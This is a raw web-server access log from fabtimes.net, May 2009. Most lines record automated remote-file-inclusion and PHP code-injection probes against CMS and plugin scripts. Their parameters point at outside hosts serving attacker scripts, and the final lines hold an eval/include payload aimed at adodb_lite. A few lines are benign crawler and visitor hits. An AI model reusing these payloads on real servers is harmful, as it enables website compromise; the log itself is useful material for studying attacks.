89.248.106.226 - - [08/May/2009:17:18:03 -0700] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.instaforms.net//components/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.fabtimes.net"
89.248.106.226 - - [08/May/2009:17:18:04 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.instaforms.net//components/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.fabtimes.net"
89.248.106.226 - - [08/May/2009:17:18:04 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.instaforms.net//components/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.fabtimes.net"
208.80.195.32 - - [08/May/2009:17:27:46 -0700] "GET / HTTP/1.0" 200 8005 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; HbTools 4.7.3)" "www.fabtimes.net"
62.178.197.14 - - [08/May/2009:17:28:07 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.instaforms.net//components/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.fabtimes.net"
62.178.197.14 - - [08/May/2009:17:28:08 -0700] "GET /config/dbutil.bck.php?confdir=http://www.instaforms.net//components/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.fabtimes.net"
62.178.197.14 - - [08/May/2009:17:28:16 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.instaforms.net//components/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.fabtimes.net"
85.214.53.125 - - [08/May/2009:17:48:48 -0700] "GET /logs/access.log///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.fabtimes.net"
85.214.53.125 - - [08/May/2009:17:48:48 -0700] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.fabtimes.net"
85.214.53.125 - - [08/May/2009:17:48:48 -0700] "GET /logs///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.fabtimes.net"
85.214.53.125 - - [08/May/2009:17:52:29 -0700] "GET /logs/access.log///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.fabtimes.net"
85.214.53.125 - - [08/May/2009:17:52:29 -0700] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.fabtimes.net"
85.214.53.125 - - [08/May/2009:17:52:29 -0700] "GET /logs///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.fabtimes.net"
66.249.67.105 - - [08/May/2009:18:13:16 -0700] "GET /november_22_2005/glasses.gif HTTP/1.1" 200 0 "-" "Googlebot-Image/1.0" "fabtimes.net"
66.249.67.105 - - [08/May/2009:18:24:38 -0700] "GET /fot/2ndfloor.jpg HTTP/1.1" 200 37196 "-" "Googlebot-Image/1.0" "fabtimes.net"
218.32.213.231 - - [08/May/2009:18:39:54 -0700] "GET /errors.php?error=http://www.oby.ch//includes/idpriv8.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.fabtimes.net"
218.32.213.231 - - [08/May/2009:18:39:54 -0700] "GET /logs/access.log/errors.php?error=http://www.oby.ch//includes/idpriv8.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.fabtimes.net"
218.32.213.231 - - [08/May/2009:18:39:54 -0700] "GET /logs/errors.php?error=http://www.oby.ch//includes/idpriv8.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.fabtimes.net"
66.249.67.105 - - [08/May/2009:19:24:18 -0700] "GET /december_2006/secret_garden.gif HTTP/1.1" 200 0 "-" "Googlebot-Image/1.0" "fabtimes.net"
66.249.67.105 - - [08/May/2009:19:26:39 -0700] "GET /princess/dAN.JPG HTTP/1.1" 200 87989 "-" "Googlebot-Image/1.0" "fabtimes.net"
85.214.53.125 - - [08/May/2009:20:45:51 -0700] "GET /include/bbs.lib.inc.php?site_path=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.fabtimes.net"
85.214.53.125 - - [08/May/2009:20:45:51 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.fabtimes.net"
85.214.53.125 - - [08/May/2009:20:45:51 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.fabtimes.net"
87.106.60.72 - - [08/May/2009:20:46:40 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.fabtimes.net"
87.106.60.72 - - [08/May/2009:20:46:40 -0700] "GET /include/bbs.lib.inc.php?site_path=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.fabtimes.net"
87.106.60.72 - - [08/May/2009:20:46:40 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.fabtimes.net"
142.59.78.62 - - [08/May/2009:20:55:33 -0700] "GET /november_22_2005/ HTTP/1.1" 200 14416 "http://images.google.ca/imgres?imgurl=http://www.fabtimes.net/november_22_2005/creepy.gif&imgrefurl=http://www.fabtimes.net/november_22_2005/&usg=__HbEB8DAYeHAiqdrDCd5VzeqUzdI=&h=444&w=333&sz=96&hl=en&start=18&um=1&tbnid=C0VyVfTIEhWezM:&tbnh=127&tbnw=95&prev=/images%3Fq%3Dcreepy%2Bdoll%26hl%3Den%26safe%3Doff%26client%3Dfirefox-a%26rls%3Dorg.mozilla:en-US:official%26hs%3D6JJ%26sa%3DN%26um%3D1" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" "www.fabtimes.net"
142.59.78.62 - - [08/May/2009:20:55:33 -0700] "GET /november_22_2005/creepy.gif HTTP/1.1" 200 98235 "http://images.google.ca/imgres?imgurl=http://www.fabtimes.net/november_22_2005/creepy.gif&imgrefurl=http://www.fabtimes.net/november_22_2005/&usg=__HbEB8DAYeHAiqdrDCd5VzeqUzdI=&h=444&w=333&sz=96&hl=en&start=18&um=1&tbnid=C0VyVfTIEhWezM:&tbnh=127&tbnw=95&prev=/images%3Fq%3Dcreepy%2Bdoll%26hl%3Den%26safe%3Doff%26client%3Dfirefox-a%26rls%3Dorg.mozilla:en-US:official%26hs%3D6JJ%26sa%3DN%26um%3D1" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" "fabtimes.net"
142.59.78.62 - - [08/May/2009:20:55:36 -0700] "GET /november_22_2005/ HTTP/1.1" 200 14416 "http://images.google.ca/imgres?imgurl=http://www.fabtimes.net/november_22_2005/creepy.gif&imgrefurl=http://www.fabtimes.net/november_22_2005/&usg=__HbEB8DAYeHAiqdrDCd5VzeqUzdI=&h=444&w=333&sz=96&hl=en&start=18&um=1&tbnid=C0VyVfTIEhWezM:&tbnh=127&tbnw=95&prev=/images%3Fq%3Dcreepy%2Bdoll%26hl%3Den%26safe%3Doff%26client%3Dfirefox-a%26rls%3Dorg.mozilla:en-US:official%26hs%3D6JJ%26sa%3DN%26um%3D1" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" "www.fabtimes.net"
121.101.159.16 - - [08/May/2009:20:58:16 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.fabtimes.net"
121.101.159.16 - - [08/May/2009:20:58:16 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.fabtimes.net"
121.101.159.16 - - [08/May/2009:20:58:16 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.fabtimes.net"
121.101.159.16 - - [08/May/2009:21:01:35 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.fabtimes.net"
121.101.159.16 - - [08/May/2009:21:01:35 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.fabtimes.net"
121.101.159.16 - - [08/May/2009:21:01:35 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.fabtimes.net"
121.101.159.16 - - [08/May/2009:21:01:47 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.fabtimes.net"
121.101.159.16 - - [08/May/2009:21:01:51 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.fabtimes.net"
121.101.159.16 - - [08/May/2009:21:01:51 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.fabtimes.net"
87.106.208.142 - - [08/May/2009:21:18:13 -0700] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.fabtimes.net"
87.106.208.142 - - [08/May/2009:21:18:13 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.fabtimes.net"
87.106.208.142 - - [08/May/2009:21:18:13 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.fabtimes.net"
87.106.135.14 - - [08/May/2009:21:18:29 -0700] "GET /logs/access.log//components/com_performs/performs.php?mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.fabtimes.net"
87.106.135.14 - - [08/May/2009:21:18:29 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.fabtimes.net"
87.106.135.14 - - [08/May/2009:21:18:30 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.fabtimes.net"
209.172.33.230 - - [08/May/2009:21:18:43 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.fabtimes.net"
209.172.33.230 - - [08/May/2009:21:18:43 -0700] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.fabtimes.net"
209.172.33.230 - - [08/May/2009:21:18:43 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.fabtimes.net"
88.84.128.40 - - [08/May/2009:21:20:23 -0700] "GET /logs/access.log//components/com_performs/performs.php?mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.fabtimes.net"
88.84.128.40 - - [08/May/2009:21:20:23 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.fabtimes.net"
88.84.128.40 - - [08/May/2009:21:20:24 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.fabtimes.net"
213.187.65.250 - - [08/May/2009:21:23:33 -0700] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://stop-op.com/cfg/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.fabtimes.net"
213.187.65.250 - - [08/May/2009:21:23:33 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://stop-op.com/cfg/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.fabtimes.net"
213.187.65.250 - - [08/May/2009:21:23:33 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://stop-op.com/cfg/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.fabtimes.net"
67.204.25.53 - - [08/May/2009:21:25:31 -0700] "GET /logs/access.log//components/com_performs/performs.php?mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.fabtimes.net"
67.204.25.53 - - [08/May/2009:21:25:31 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.fabtimes.net"
67.204.25.53 - - [08/May/2009:21:25:31 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.fabtimes.net"
218.32.213.231 - - [08/May/2009:21:31:17 -0700] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.fabtimes.net"
218.32.213.231 - - [08/May/2009:21:31:17 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.fabtimes.net"
218.32.213.231 - - [08/May/2009:21:31:17 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.fabtimes.net"
85.214.86.93 - - [08/May/2009:21:53:36 -0700] "GET /error.php?dir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.fabtimes.net"
85.214.86.93 - - [08/May/2009:21:53:36 -0700] "GET /logs/error.php?dir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.fabtimes.net"
85.214.86.93 - - [08/May/2009:21:53:37 -0700] "GET /logs/access.log%20%20/error.php?dir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.fabtimes.net"
69.94.30.156 - - [08/May/2009:22:04:05 -0700] "GET /logs/access.log/errors.php?error=http://www.instaforms.net//components/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.fabtimes.net"
69.94.30.156 - - [08/May/2009:22:04:06 -0700] "GET /errors.php?error=http://www.instaforms.net//components/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.fabtimes.net"
69.94.30.156 - - [08/May/2009:22:04:06 -0700] "GET /logs/errors.php?error=http://www.instaforms.net//components/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.fabtimes.net"
74.205.123.49 - - [08/May/2009:22:04:34 -0700] "GET /logs/access.log/errors.php?error=http://www.instaforms.net//components/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.fabtimes.net"
74.205.123.49 - - [08/May/2009:22:04:34 -0700] "GET /errors.php?error=http://www.instaforms.net//components/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.fabtimes.net"
74.205.123.49 - - [08/May/2009:22:04:34 -0700] "GET /logs/errors.php?error=http://www.instaforms.net//components/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.fabtimes.net"
77.221.130.9 - - [08/May/2009:22:05:01 -0700] "GET /logs/access.log/errors.php?error=http://www.instaforms.net//components/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.fabtimes.net"
77.221.130.9 - - [08/May/2009:22:05:02 -0700] "GET /errors.php?error=http://www.instaforms.net//components/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.fabtimes.net"
77.221.130.9 - - [08/May/2009:22:05:02 -0700] "GET /logs/errors.php?error=http://www.instaforms.net//components/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.fabtimes.net"
89.248.106.226 - - [08/May/2009:22:13:43 -0700] "GET /logs/access.log/errors.php?error=http://www.instaforms.net//components/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.fabtimes.net"
89.248.106.226 - - [08/May/2009:22:13:43 -0700] "GET /errors.php?error=http://www.instaforms.net//components/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.fabtimes.net"
89.248.106.226 - - [08/May/2009:22:13:44 -0700] "GET /logs/errors.php?error=http://www.instaforms.net//components/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.fabtimes.net"
69.94.30.156 - - [08/May/2009:22:19:19 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.instaforms.net//components/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.fabtimes.net"
69.94.30.156 - - [08/May/2009:22:19:19 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.instaforms.net//components/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.fabtimes.net"
69.94.30.156 - - [08/May/2009:22:19:19 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.instaforms.net//components/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.fabtimes.net"
77.221.130.9 - - [08/May/2009:22:21:15 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.instaforms.net//components/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.fabtimes.net"
77.221.130.9 - - [08/May/2009:22:21:16 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.instaforms.net//components/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.fabtimes.net"
77.221.130.9 - - [08/May/2009:22:21:16 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.instaforms.net//components/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.fabtimes.net"
74.205.123.49 - - [08/May/2009:22:23:56 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.instaforms.net//components/Roseid.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.fabtimes.net"
74.205.123.49 - - [08/May/2009:22:23:56 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.instaforms.net//components/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.fabtimes.net"
74.205.123.49 - - [08/May/2009:22:23:57 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.instaforms.net//components/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.fabtimes.net"
202.53.250.98 - - [08/May/2009:22:26:28 -0700] "GET /logs/access.log//components/com_performs/performs.php?mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.fabtimes.net"
202.53.250.98 - - [08/May/2009:22:26:36 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.fabtimes.net"
85.214.86.93 - - [08/May/2009:22:29:59 -0700] "GET /logs/access.log%20%20/error.php?dir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.fabtimes.net"
85.214.86.93 - - [08/May/2009:22:29:59 -0700] "GET /error.php?dir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.fabtimes.net"
85.214.86.93 - - [08/May/2009:22:29:59 -0700] "GET /logs/error.php?dir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.fabtimes.net"
94.27.103.171 - - [08/May/2009:22:35:44 -0700] "GET /gbook/ HTTP/1.0" 200 508 "http://www.fabtimes.net/gbook/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 95; BCD2000)" "www.fabtimes.net"
94.27.103.171 - - [08/May/2009:22:35:44 -0700] "GET / HTTP/1.0" 200 8005 "http://www.fabtimes.net/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 95; BCD2000)" "www.fabtimes.net"
89.248.106.226 - - [08/May/2009:22:37:57 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.instaforms.net//components/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.fabtimes.net"
89.248.106.226 - - [08/May/2009:22:37:57 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.instaforms.net//components/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.fabtimes.net"
89.248.106.226 - - [08/May/2009:22:38:01 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.instaforms.net//components/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.fabtimes.net"
62.178.197.14 - - [08/May/2009:22:48:15 -0700] "GET /logs/access.log/errors.php?error=http://www.instaforms.net//components/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.fabtimes.net"
62.178.197.14 - - [08/May/2009:22:48:15 -0700] "GET /errors.php?error=http://www.instaforms.net//components/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.fabtimes.net"
62.178.197.14 - - [08/May/2009:22:48:16 -0700] "GET /logs/errors.php?error=http://www.instaforms.net//components/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.fabtimes.net"
93.187.232.189 - - [08/May/2009:23:11:01 -0700] "GET /logs/access.log//include/write.php?dir=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.fabtimes.net"
93.187.232.189 - - [08/May/2009:23:11:02 -0700] "GET /include/write.php?dir=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.fabtimes.net"
93.187.232.189 - - [08/May/2009:23:11:02 -0700] "GET /logs//include/write.php?dir=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.fabtimes.net"
93.187.232.189 - - [08/May/2009:23:11:59 -0700] "GET /logs/access.log//include/write.php?dir=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.fabtimes.net"
93.187.232.189 - - [08/May/2009:23:12:00 -0700] "GET /include/write.php?dir=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.fabtimes.net"
93.187.232.189 - - [08/May/2009:23:12:00 -0700] "GET /logs//include/write.php?dir=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.fabtimes.net"
87.106.135.14 - - [09/May/2009:00:14:13 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.fabtimes.net"
87.106.135.14 - - [09/May/2009:00:14:14 -0700] "GET /config/dbutil.bck.php?confdir=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.fabtimes.net"
87.106.135.14 - - [09/May/2009:00:14:14 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.fabtimes.net"
88.84.128.40 - - [09/May/2009:00:16:01 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.fabtimes.net"
88.84.128.40 - - [09/May/2009:00:16:02 -0700] "GET /config/dbutil.bck.php?confdir=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.fabtimes.net"
88.84.128.40 - - [09/May/2009:00:16:02 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.fabtimes.net"
121.254.231.239 - - [09/May/2009:01:52:57 -0700] "GET /config/dbutil.bck.php?confdir=http://arsenal-music.ru/modules/mod_poll/tmpl/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.fabtimes.net"
121.254.231.239 - - [09/May/2009:01:52:57 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://arsenal-music.ru/modules/mod_poll/tmpl/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.fabtimes.net"
121.254.231.239 - - [09/May/2009:01:52:57 -0700] "GET /logs/access.log%20%20//config/dbutil.bck.php?confdir=http://arsenal-music.ru/modules/mod_poll/tmpl/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.fabtimes.net"
217.172.168.63 - - [09/May/2009:02:05:15 -0700] "GET /logs/access.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://no-fuck.pl/Bnet/tc.v? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.fabtimes.net"
217.172.168.63 - - [09/May/2009:02:05:15 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://no-fuck.pl/Bnet/tc.v? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.fabtimes.net"
217.172.168.63 - - [09/May/2009:02:05:16 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://no-fuck.pl/Bnet/tc.v? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.fabtimes.net"
